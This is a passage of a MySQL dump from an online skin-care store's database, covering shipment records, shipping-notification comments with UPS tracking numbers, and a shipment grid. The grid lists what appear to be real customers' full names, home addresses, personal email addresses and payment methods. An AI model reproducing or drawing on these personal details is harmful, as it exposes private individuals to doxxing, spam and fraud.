Service.',1),(49,3,NULL,1.0000,1,1,75,NULL,149,150,NULL,'IT-00042','2022-02-21 13:32:51','2022-02-21 13:32:58','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  You item has been shipped via US Postal Service.',1),(50,3,NULL,2.0000,1,1,76,NULL,151,152,NULL,'IT-00043','2022-02-21 13:36:14','2022-02-21 13:36:16','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  You item has been shipped via US Postal Service.',1),(51,3,NULL,1.0000,1,1,79,NULL,157,158,NULL,'IT-00044','2022-02-24 19:49:02','2022-02-24 19:49:06','[]',NULL,'Your order has been shipped.',1),(52,3,NULL,4.0000,1,1,78,NULL,155,156,NULL,'IT-00045','2022-02-24 19:56:39','2022-02-24 19:56:46','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your order has been shipped.',1),(53,3,NULL,1.0000,1,1,77,NULL,153,154,NULL,'IT-00046','2022-02-24 20:43:42','2022-02-24 20:43:45','[]',NULL,'Your package has shipped.',1),(54,3,NULL,1.0000,1,1,80,NULL,159,160,NULL,'IT-00047','2022-03-07 12:10:32','2022-03-07 12:10:40','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your order has been processed and will ship via UPS.  You will receive tracking number from UPS once shipped.',1),(55,3,NULL,1.0000,1,1,81,NULL,161,162,NULL,'IT-00048','2022-03-07 12:16:19','2022-03-07 12:16:20','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your order has been processed and will ship via UPS.  You will receive tracking once the order has been picked up by UPS.',1),(56,3,NULL,6.0000,1,1,82,700,163,164,NULL,'IT-00049','2022-03-10 22:04:27','2022-03-10 22:04:33','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your order has been processed and will ship tomorrow.  You will also receive tracking information via UPS once it\'s picked up.',1),(57,3,NULL,1.0000,1,1,83,NULL,165,166,NULL,'IT-00050','2022-03-11 22:58:37','2022-03-11 22:58:44','[]',NULL,'Your order has been processed and shipped.',1),(58,3,NULL,1.0000,1,1,84,NULL,167,168,NULL,'IT-00051','2022-03-15 11:36:59','2022-03-15 11:37:09','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your package will ship today.  The UPS Tracking number is 1Z6X6W600335185334.',1),(59,3,NULL,1.0000,1,1,85,NULL,169,170,NULL,'IT-00052','2022-03-15 11:47:35','2022-03-15 11:47:38','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your package will ship today.  Your UPS Tracking number is 1Z6X6W600306141560.',1),(60,3,NULL,1.0000,1,1,86,NULL,171,172,NULL,'IT-00053','2022-03-17 18:55:50','2022-03-17 18:55:57','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your package has shipped.  The UPS tracking number is 1Z6X6W600338892341.',1),(61,3,NULL,2.0000,1,1,87,701,173,174,NULL,'IT-00054','2022-03-24 15:49:04','2022-03-24 15:49:17','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your tracking number is 1Z6X6W600336739556.',1),(62,3,NULL,1.0000,1,1,88,NULL,175,176,NULL,'IT-00055','2022-03-24 16:22:14','2022-03-24 16:22:22','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your package has shipped.  Your UPS tracking number is 1Z6X6W600331530968.',1),(63,3,NULL,1.0000,1,1,89,NULL,177,178,NULL,'IT-00056','2022-03-31 10:26:54','2022-03-31 10:27:02','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care. Your order has been been processed and shipped. ',1),(64,3,NULL,1.0000,1,1,90,729,179,180,NULL,'IT-00057','2022-04-15 12:45:56','2022-04-15 12:45:59','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600325162387.',1),(65,3,NULL,2.0000,1,1,91,NULL,181,182,NULL,'IT-00058','2022-04-15 12:51:58','2022-04-15 12:52:02','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is v.',1),(66,3,NULL,2.0000,1,1,92,NULL,183,184,NULL,'IT-00059','2022-05-30 12:00:26','2022-05-30 12:00:37','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600316416807.',1),(67,3,NULL,1.0000,1,1,93,NULL,185,186,NULL,'IT-00060','2022-07-05 06:21:10','2022-07-05 06:21:12','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600325933446.',1),(68,3,NULL,4.0000,1,1,94,2919,187,188,NULL,'IT-00061','2022-07-11 02:28:23','2022-07-11 02:28:25','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600324602653.',1),(69,3,NULL,1.0000,1,1,95,NULL,189,190,NULL,'IT-00062','2022-07-25 12:17:31','2022-07-25 12:17:32','[]',NULL,NULL,NULL),(70,3,NULL,1.0000,1,1,96,NULL,191,192,NULL,'IT-00063','2022-08-01 12:53:25','2022-08-01 12:53:26','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600317750837',1),(71,3,NULL,1.0000,1,1,97,NULL,193,194,NULL,'IT-00064','2022-08-02 11:03:08','2022-08-02 11:03:09','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600325331480.',1),(72,3,NULL,1.0000,1,1,98,NULL,195,196,NULL,'IT-00065','2022-08-11 13:01:47','2022-08-11 13:01:49','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600331961494.',1),(73,3,NULL,1.0000,1,1,99,NULL,197,198,NULL,'IT-00066','2022-08-14 12:35:42','2022-08-14 12:35:44','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600331191709.',1),(74,3,NULL,2.0000,1,1,100,NULL,199,200,NULL,'IT-00067','2022-08-16 04:22:00','2022-08-16 04:22:02','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600318359241.',1),(75,3,NULL,1.0000,1,1,101,NULL,201,202,NULL,'IT-00068','2022-09-01 17:03:14','2022-09-01 17:03:26','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS Tracking number is 1Z6X6W600335026112.',1),(76,3,NULL,1.0000,1,1,102,NULL,203,204,NULL,'IT-00069','2022-09-09 17:11:55','2022-09-09 17:12:08','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600335548728.\r\n',1),(77,3,NULL,1.0000,1,1,103,NULL,205,206,NULL,'IT-00070','2022-10-14 15:08:27','2022-10-14 15:08:37','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600336885755.',1),(78,3,NULL,1.0000,1,1,105,NULL,209,210,NULL,'IT-00071','2022-10-28 19:56:46','2022-10-28 19:56:59','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS Tracking number is 1Z6X6W600303171677.',1),(79,1,NULL,1.0000,1,1,104,7866,207,208,NULL,'V-00008','2022-10-28 20:11:47','2022-10-28 20:11:56','[]',NULL,'Thank you for shopping at VarNasol.  Your UPS tracking number is 1Z9E1E990397473054.',1),(80,3,NULL,2.0000,1,1,106,NULL,211,212,NULL,'IT-00072','2022-11-24 19:43:49','2022-11-24 19:43:58','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1z6x6w600306608904.',1),(81,3,NULL,1.0000,1,1,107,8113,213,214,NULL,'IT-00073','2022-12-06 13:12:00','2022-12-06 13:12:12','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.',1),(82,3,NULL,2.0000,1,1,108,NULL,215,216,NULL,'IT-00074','2022-12-19 12:45:44','2022-12-19 12:45:57','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600339120584.',1),(83,3,NULL,1.0000,1,1,109,NULL,217,218,NULL,'IT-00075','2022-12-27 13:10:02','2022-12-27 13:10:16','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600332184804.',1),(84,3,NULL,1.0000,1,1,110,NULL,219,220,NULL,'IT-00076','2022-12-28 14:35:43','2022-12-28 14:35:58','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600335881215.',1),(85,3,NULL,2.0000,1,1,111,NULL,221,222,NULL,'IT-00077','2022-12-29 13:32:23','2022-12-29 13:33:09','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600313174959.',1),(86,3,NULL,2.0000,1,1,112,NULL,223,224,NULL,'IT-00078','2023-01-05 04:26:42','2023-01-05 04:26:50','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.   Your package has shipped.  Your UPS tracking number is 1Z6X6W600333505821.',1),(87,3,NULL,1.0000,1,1,115,8144,229,230,NULL,'IT-00079','2023-02-22 15:34:52','2023-02-22 15:35:03','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your package has shipped.  Your tracking number is 1Z6X6W600303851816.',1),(88,3,NULL,2.0000,NULL,NULL,113,NULL,225,226,NULL,'IT-00080','2023-02-22 15:36:45','2023-02-22 15:36:45','[]',NULL,NULL,NULL),(89,3,NULL,1.0000,1,1,114,NULL,227,228,NULL,'IT-00081','2023-02-22 15:48:23','2023-02-22 15:48:33','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your tracking number is 1Z6X6W600336075648.',1),(90,3,NULL,1.0000,1,1,116,NULL,231,232,NULL,'IT-00082','2023-03-03 03:39:41','2023-03-03 03:39:53','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS Tracking number is 1Z3yo76R10x7Y325748.',1),(91,3,NULL,1.0000,NULL,1,117,NULL,233,234,NULL,'IT-00083','2023-03-16 20:45:29','2023-03-16 20:45:33','[]',NULL,'Thank you for shopping at Imperial Touch.  Your UPS tracking number is 1Z6X6W600317165827.',1);

--
-- Table structure for table `sales_shipment_comment`
--

CREATE TABLE `sales_shipment_comment` (
  `entity_id` int unsigned NOT NULL COMMENT 'Entity ID',
  `parent_id` int unsigned NOT NULL COMMENT 'Parent ID',
  `is_customer_notified` int DEFAULT NULL COMMENT 'Is Customer Notified',
  `is_visible_on_front` smallint unsigned NOT NULL DEFAULT '0' COMMENT 'Is Visible On Front',
  `comment` text COMMENT 'Comment',
  `created_at` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP COMMENT 'Created At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Sales Flat Shipment Comment';

--
-- Dumping data for table `sales_shipment_comment`
--

INSERT INTO `sales_shipment_comment` VALUES (2,4,1,1,'TESTING  TESTING','2020-12-10 19:14:34'),(3,8,1,0,'Thank you for shopping at Imperial Touch Skin Care. Attached, is your receipt.  Please visit ImperialTouch.com and sign up for our newsletter to receive exclusive offers.  Your UPS tracking number is 1Z6X6W600316182239.\r\n\r\nKeep In Touch:\r\n800-504-8606 \r\ntwitter.com/imperialtouch \r\nfacebook.com/imperialtouch1 \r\ninstagram.com/imperialtouch1','2021-02-15 13:06:29'),(4,9,1,0,'Thank you for shopping at Imperial Touch Skin Care. Attached, is your receipt.  Please visit ImperialTouch.com and sign up for our newsletter to receive exclusive offers.  Your UPS tracking number is 1Z6X6W600307398649.\r\n\r\nKeep In Touch:\r\n800-504-8606 \r\ntwitter.com/imperialtouch \r\nfacebook.com/imperialtouch1 \r\ninstagram.com/imperialtouch1','2021-02-15 13:15:23'),(5,10,1,0,'Thank you for shopping at Imperial Touch Skin Care. Attached, is your shipping receipt via UPS.  1Z6X6W600304221067.  Please visit ImperialTouch.com and sign up for our newsletter to receive exclusive offers.  \r\n\r\nKeep In Touch: \r\ntwitter.com/imperialtouch \r\nfacebook.com/imperialtouch1 \r\ninstagram.com/imperialtouch1','2021-03-04 12:57:31'),(6,11,1,0,'Thank you for shopping at Imperial Touch Skin Care. Attached, is your receipt.  Please visit ImperialTouch.com and sign up for our newsletter to receive exclusive offers.  Your UPS tracking number is 1Z6X6W600303395079.\r\n\r\nKeep In Touch:\r\n800-504-8606 \r\ntwitter.com/imperialtouch \r\nfacebook.com/imperialtouch1 \r\ninstagram.com/imperialtouch1','2021-03-22 11:43:26'),(7,24,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your package has shipped.','2021-06-03 19:31:19'),(8,27,1,0,'Thank you for shopping at Imperial Touch','2021-07-10 07:05:49'),(9,28,1,0,'1Z6X6W600315107278','2021-08-27 17:17:35'),(10,29,1,0,'1Z6X6W600312352482','2021-08-27 22:18:35'),(11,34,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Attached, is your tracking number.  1Z6X6W600308086555.','2021-10-13 15:39:51'),(12,36,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Attached, is your tracking number. 1Z6X6W600331419302','2021-10-13 15:53:38'),(13,37,1,0,'Thank you for shopping at Imperial Touch Skin Care.  The Pandemic has caused delay a little longer then expected, however, we appreciate your business.  We have provided you with a gift for the delay.  Attached, is your tracking number.  1Z6X6W600339805719','2021-10-13 15:59:57'),(14,38,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Attached, is your tracking number.  1Z6X6W600308043378','2021-10-13 16:06:08'),(15,40,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your package is on the way.  Here is the UPS tracking number.','2021-10-19 12:14:24'),(16,42,1,0,'Your order has been shipped.  The UPS tracking number is 1Z6X6W600320870148.','2021-11-20 13:34:57'),(17,44,0,0,'Thank you for shopping Imperial Touch Skin Care.  Your order has been shipped.','2022-01-07 15:05:10'),(18,45,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your order has been shipped.','2022-01-07 15:06:40'),(19,46,1,0,'Thank you for shopping at Imperial Touch.  Your order has shipped.','2022-01-13 21:10:32'),(20,48,1,0,'Thank you for shopping at Imperial Touch.  Your order has shipped via US Postal Service.','2022-01-19 06:35:18'),(21,49,1,0,'Thank you for shopping at Imperial Touch Skin Care.  You item has been shipped via US Postal Service.','2022-02-21 13:32:55'),(22,50,1,0,'Thank you for shopping at Imperial Touch Skin Care.  You item has been shipped via US Postal Service.','2022-02-21 13:36:15'),(23,51,1,0,'Your order has been shipped.','2022-02-24 19:49:04'),(24,52,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your order has been shipped.','2022-02-24 19:56:41'),(25,53,1,0,'Your package has shipped.','2022-02-24 20:43:44'),(26,54,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your order has been processed and will ship via UPS.  You will receive tracking number from UPS once shipped.','2022-03-07 12:10:36'),(27,55,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your order has been processed and will ship via UPS.  You will receive tracking once the order has been picked up by UPS.','2022-03-07 12:16:19'),(28,56,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your order has been processed and will ship tomorrow.  You will also receive tracking information via UPS once it\'s picked up.','2022-03-10 22:04:30'),(29,57,1,0,'Your order has been processed and shipped.','2022-03-11 22:58:41'),(30,58,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your package will ship today.  The UPS Tracking number is 1Z6X6W600335185334.','2022-03-15 11:37:05'),(31,59,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your package will ship today.  Your UPS Tracking number is 1Z6X6W600306141560.','2022-03-15 11:47:37'),(32,60,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your package has shipped.  The UPS tracking number is 1Z6X6W600338892341.','2022-03-17 18:55:54'),(33,61,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your tracking number is 1Z6X6W600336739556.','2022-03-24 15:49:13'),(34,62,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your package has shipped.  Your UPS tracking number is 1Z6X6W600331530968.','2022-03-24 16:22:17'),(35,63,1,0,'Thank you for shopping at Imperial Touch Skin Care. Your order has been been processed and shipped. ','2022-03-31 10:26:55'),(36,64,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600325162387.','2022-04-15 12:45:59'),(37,65,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is v.','2022-04-15 12:52:02'),(38,66,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600316416807.','2022-05-30 12:00:36'),(39,67,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600325933446.','2022-07-05 06:21:11'),(40,68,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600324602653.','2022-07-11 02:28:25'),(41,70,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600317750837','2022-08-01 12:53:26'),(42,71,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600325331480.','2022-08-02 11:03:09'),(43,72,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600331961494.','2022-08-11 13:01:48'),(44,73,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600331191709.','2022-08-14 12:35:43'),(45,74,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600318359241.','2022-08-16 04:22:01'),(46,75,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS Tracking number is 1Z6X6W600335026112.','2022-09-01 17:03:16'),(47,76,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600335548728.\r\n','2022-09-09 17:11:58'),(48,77,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600336885755.','2022-10-14 15:08:28'),(49,78,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS Tracking number is 1Z6X6W600303171677.','2022-10-28 19:56:50'),(50,79,1,0,'Thank you for shopping at VarNasol.  Your UPS tracking number is 1Z9E1E990397473054.','2022-10-28 20:11:47'),(51,80,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1z6x6w600306608904.','2022-11-24 19:43:50'),(52,81,1,0,'Thank you for shopping at Imperial Touch Skin Care.','2022-12-06 13:12:03'),(53,82,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600339120584.','2022-12-19 12:45:47'),(54,83,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600332184804.','2022-12-27 13:10:07'),(55,84,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600335881215.','2022-12-28 14:35:49'),(56,85,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS tracking number is 1Z6X6W600313174959.','2022-12-29 13:32:28'),(57,86,1,0,'Thank you for shopping at Imperial Touch Skin Care.   Your package has shipped.  Your UPS tracking number is 1Z6X6W600333505821.','2023-01-05 04:26:42'),(58,87,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your package has shipped.  Your tracking number is 1Z6X6W600303851816.','2023-02-22 15:34:54'),(59,89,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your tracking number is 1Z6X6W600336075648.','2023-02-22 15:48:24'),(60,90,1,0,'Thank you for shopping at Imperial Touch Skin Care.  Your UPS Tracking number is 1Z3yo76R10x7Y325748.','2023-03-03 03:39:43'),(61,91,1,0,'Thank you for shopping at Imperial Touch.  Your UPS tracking number is 1Z6X6W600317165827.','2023-03-16 20:45:30');

--
-- Table structure for table `sales_shipment_grid`
--

CREATE TABLE `sales_shipment_grid` (
  `entity_id` int unsigned NOT NULL COMMENT 'Entity ID',
  `increment_id` varchar(50) DEFAULT NULL COMMENT 'Increment ID',
  `store_id` smallint unsigned DEFAULT NULL COMMENT 'Store ID',
  `order_increment_id` varchar(32) NOT NULL COMMENT 'Order Increment ID',
  `order_id` int unsigned NOT NULL COMMENT 'Order ID',
  `order_created_at` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP COMMENT 'Order Increment ID',
  `customer_name` varchar(128) NOT NULL COMMENT 'Customer Name',
  `total_qty` decimal(12,4) DEFAULT NULL COMMENT 'Total Qty',
  `shipment_status` int DEFAULT NULL COMMENT 'Shipment Status',
  `order_status` varchar(32) DEFAULT NULL COMMENT 'Order',
  `billing_address` varchar(255) DEFAULT NULL COMMENT 'Billing Address',
  `shipping_address` varchar(255) DEFAULT NULL COMMENT 'Shipping Address',
  `billing_name` varchar(128) DEFAULT NULL COMMENT 'Billing Name',
  `shipping_name` varchar(128) DEFAULT NULL COMMENT 'Shipping Name',
  `customer_email` varchar(128) DEFAULT NULL COMMENT 'Customer Email',
  `customer_group_id` int DEFAULT NULL,
  `payment_method` varchar(32) DEFAULT NULL COMMENT 'Payment Method',
  `shipping_information` varchar(255) DEFAULT NULL COMMENT 'Shipping Method Name',
  `created_at` timestamp NULL DEFAULT NULL COMMENT 'Created At',
  `updated_at` timestamp NULL DEFAULT NULL COMMENT 'Updated At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Sales Flat Shipment Grid';

--
-- Dumping data for table `sales_shipment_grid`
--

INSERT INTO `sales_shipment_grid` VALUES (4,'000000004',1,'000000017',8,'2020-12-07 19:25:45','Gary  Jean-Paul',1.0000,NULL,'processing','915 Doyle Rd\nSuite 33 Unit 329,Deltona,Florida,32725','8042 Pennington Drive,Laurel,Maryland,20724','Gary  Jean-Paul','Auri M','mizlunah2u@gmail.com',0,'squareup_payment','Flat Rate - Fixed','2020-12-10 19:02:40','2020-12-10 19:02:50'),(5,'000000005',1,'000000012',5,'2020-10-23 02:37:17','',1.0000,NULL,'processing','Flat no. 507 Wing A Raheja Residency\nFilm City Road,Mumbai,Maharashtra,400097','Flat no. 507 Wing A Raheja Residency\nFilm City Road,Mumbai,Maharashtra,400097','John Doe','John Doe','sb-lnlfl3486525@personal.example.com',0,'paypal_express','Flat Rate - Fixed','2020-12-16 15:59:44','2020-12-16 15:59:44'),(8,'IT-00001',3,'3000000022',24,'2021-02-11 00:36:12','',1.0000,NULL,'complete','23811 Calico Chase,San Antonio ,Texas,78260','23811 Calico Chase,San Antonio ,Texas,78260','Keith Blackmon','Keith Blackmon','keith_blackmon@yahoo.com',0,'paypal_express','Flat Rate - Fixed','2021-02-15 13:06:27','2021-02-15 13:06:27'),(9,'IT-00002',3,'IT-00025',29,'2021-02-14 03:18:08','',1.0000,NULL,'complete','6041 SOUTHBEND CT,DOUGLASVILLE,Georgia,30134','6041 SOUTHBEND CT,DOUGLASVILLE,Georgia,30134','Clifford Adams Jr.','Clifford Adams Jr.','ciadamsjr@gmail.com',0,'paypal_express','Square Shipping - Square Shipping','2021-02-15 13:15:23','2021-02-15 13:15:23'),(10,'IT-00003',3,'IT-00030',30,'2021-03-02 17:50:30','',3.0000,NULL,'complete','10463 pinion trail,Escondido,California,92026','10463 pinion trail,Escondido,California,92026','Yolanda Freeman','Yolanda Freeman','yolandaf181@gmail.com',0,'paypal_express','Free Shipping - Free','2021-03-04 12:57:28','2021-03-04 12:57:28'),(11,'IT-00004',3,'IT-00453',33,'2021-03-20 13:51:33','',2.0000,NULL,'complete','3871 Quarryville Ct,Fairfield,California,94533','3871 Quarryville Ct,Fairfield,California,94533','Tegre Miles','Tegre Miles','bigteg@aol.com',0,'paypal_express','Flat Rate - Fixed','2021-03-22 11:43:22','2021-03-22 11:43:22'),(12,'IT-00005',3,'IT-00448',32,'2021-03-17 21:23:47','',1.0000,NULL,'complete','302 christian ct,Hampton,Georgia,30228','302 christian ct,Hampton,Georgia,30228','Antine marzette','Antine marzette','26sdummy@gmail.com',0,'paypal_express','Flat Rate - Fixed','2021-03-23 10:12:50','2021-03-23 10:12:50'),(13,'IT-00006',3,'IT-00454',34,'2021-03-23 02:56:34','',5.0000,NULL,'complete','829 Bishops Run Ln,Mableton,Georgia,30126','829 Bishops Run Ln,Mableton,Georgia,30126','Nathaniel Collins','Nathaniel Collins','ncollins64@gmail.com',0,'paypal_express','Free Shipping - Free','2021-03-25 10:03:21','2021-03-25 10:03:21'),(14,'IT-00007',3,'IT-00463',36,'2021-03-31 22:00:54','',1.0000,NULL,'complete','3720 Knotts Pass road,Snellville ,Georgia,30039','1460 distraction dr. Unit # 6209,Suwannee ,Georgia,30024','Saki Dougba','Davis John','dougba3@gmail.com',0,'paypal_express','Flat Rate - Fixed','2021-04-19 12:30:20','2021-04-19 12:30:20'),(15,'IT-00008',3,'IT-00457',35,'2021-03-29 21:47:35','',2.0000,NULL,'complete','4205 Sumter Street,Savannah,Georgia,31405','4205 Sumter Street,Savannah,Georgia,31405','Brandon Anim','Brandon Anim','anim.brandon@gmail.com',0,'paypal_express','United Parcel Service - UPS Ground','2021-04-19 23:27:37','2021-04-19 23:27:37'),(16,'IT-00009',3,'IT-00465',38,'2021-04-03 11:34:43','',4.0000,NULL,'complete','815 BEECH VALLEY RD,Lithia Springs,Georgia,30122','815 BEECH VALLEY RD,Lithia Springs,Georgia,30122','Charles Walden','Charles Walden','waldenautorepair@gmail.com',0,'paypal_express','Free Shipping - Free','2021-04-19 23:32:22','2021-04-19 23:32:22'),(17,'IT-00010',3,'IT-00468',39,'2021-04-05 20:18:23','',1.0000,NULL,'complete','1450 Mount Olivet Road,MARTINSVILLE,Virginia,24112','1450 Mount Olivet Road,MARTINSVILLE,Virginia,24112','Elizabeth Hairston','Elizabeth Hairston','mrsh430@gmail.com',0,'paypal_express','Flat Rate - Fixed','2021-04-19 23:38:31','2021-04-19 23:38:31'),(18,'IT-00011',3,'IT-00474',40,'2021-04-14 23:37:23','',1.0000,NULL,'complete','1977 B Forest Ave #2,North Charleston ,South Carolina,29405','1977 B Forest Ave #2,North Charleston ,South Carolina,29405','Charles  Green','Charles  Green','cgreenelife@bellsouth.net',0,'paypal_express','Flat Rate - Fixed','2021-04-19 23:43:01','2021-04-19 23:43:01'),(19,'IT-00012',3,'IT-00475',41,'2021-04-16 06:27:21','',1.0000,NULL,'complete','1260 Main St,Agawam,Massachusetts,01001-2584','1260 Main St,Agawam,Massachusetts,01001-2584','Ryan Spence','Ryan Spence','ryan.centerpointrec@gmail.com',0,'paypal_express','Flat Rate - Fixed','2021-04-19 23:47:31','2021-04-19 23:47:31'),(20,'IT-00013',3,'IT-00476',42,'2021-04-19 02:57:56','',3.0000,NULL,'complete','None,3232 Timber Rdg,Atlanta,Georgia,30349','None,3232 Timber Rdg,Atlanta,Georgia,30349','Aieya JEAN-FRANCOIS','Aieya JEAN-FRANCOIS','hotpeasnbutter@yahoo.com',0,'paypal_express','United Parcel Service - UPS Ground','2021-04-19 23:53:01','2021-04-19 23:53:01'),(21,'IT-00014',3,'IT-00464',37,'2021-04-02 01:21:15','',1.0000,NULL,'complete','100 Retreat Lane,McDonough ,Georgia,30252','100 Retreat Lane,McDonough ,Georgia,30252','Vanne  Jester','Vanne  Jester','cjester357@yahoo.com',0,'paypal_express','Flat Rate - Fixed','2021-04-23 08:57:32','2021-04-23 08:57:32'),(22,'IT-00015',3,'IT-00477',43,'2021-04-21 04:16:13','Robert James, II',3.0000,NULL,'complete','4633 Ivygate Cir SE,Atlanta,Georgia,30339','4633 Ivygate Cir SE,Atlanta,Georgia,30339','Robert James, II','Robert James, II','rjamesii@gmail.com',1,'paypal_express','Free Shipping - Free','2021-04-23 20:53:03','2021-04-23 20:53:03'),(23,'IT-00016',3,'IT-00478',44,'2021-05-12 02:36:04','',1.0000,NULL,'complete','1095 Bay Pointe Crossing,Alpharetta,Georgia,30005','1095 Bay Pointe Crossing,Alpharetta,Georgia,30005','Orlando Hampton','Orlando Hampton','orhampton06@yahoo.com',0,'paypal_express','Flat Rate - Fixed','2021-05-18 09:49:11','2021-05-18 09:49:11'),(24,'IT-00017',3,'IT-00489',50,'2021-06-03 00:04:34','Marlon McDaniel',1.0000,NULL,'complete','410 Invector Court,Locust Grove,Georgia,30248','6016 CASTLEGATE DR,Riverdale,Georgia,30296','Marlon  McDaniel','Marlon McDaniel','georgianewbred@yahoo.com',1,'squareup_payment','Flat Rate - Fixed','2021-06-03 19:31:15','2021-06-03 19:31:15'),(25,'IT-00018',3,'IT-00490',51,'2021-06-04 21:53:55','',1.0000,NULL,'complete','8034 STEPHANIE CT,JONESBORO,Georgia,30236-3945','8034 STEPHANIE CT,JONESBORO,Georgia,30236-3945','Steven A. Finderson','Steven A. Finderson','s.finderson@yahoo.com',0,'paypal_express','Flat Rate - Fixed','2021-06-06 03:59:39','2021-06-06 03:59:39'),(26,'IT-00019',3,'IT-00491',52,'2021-06-14 04:29:22','',6.0000,NULL,'complete','4147 Ballina Dr,Decatur,Georgia,30034-5304','4147 Ballina Dr,Decatur,Georgia,30034-5304','Adrian Woods','Adrian Woods','cujothebiker@gmail.com',0,'paypal_express','Free Shipping - Free','2021-06-14 12:32:34','2021-06-14 12:32:34'),(27,'IT-00020',3,'IT-00496',53,'2021-07-03 06:01:34','bilal jean-paul',1.0000,NULL,'complete','2nd Street,Alaska,Alaska,12345','2nd Street,Alaska,Alaska,12345','Test Demo','Test Demo','babusahab93@gmail.com',1,'cashondelivery','Flat Rate - Fixed','2021-07-10 07:05:47','2021-07-10 07:05:47'),(28,'IT-00021',3,'IT-00517',55,'2021-08-26 13:25:24','Maurice Waters',1.0000,NULL,'complete','4535 Wakefield Ave NE,Comstock Park,Michigan,49321','4535 Wakefield Ave NE,Comstock Park,Michigan,49321','Maurice Waters','Maurice Waters','wizid97@gmail.com',0,'squareup_payment','Flat Rate - Fixed','2021-08-27 17:17:30','2021-08-27 17:17:30'),(29,'IT-00022',3,'IT-00516',54,'2021-08-21 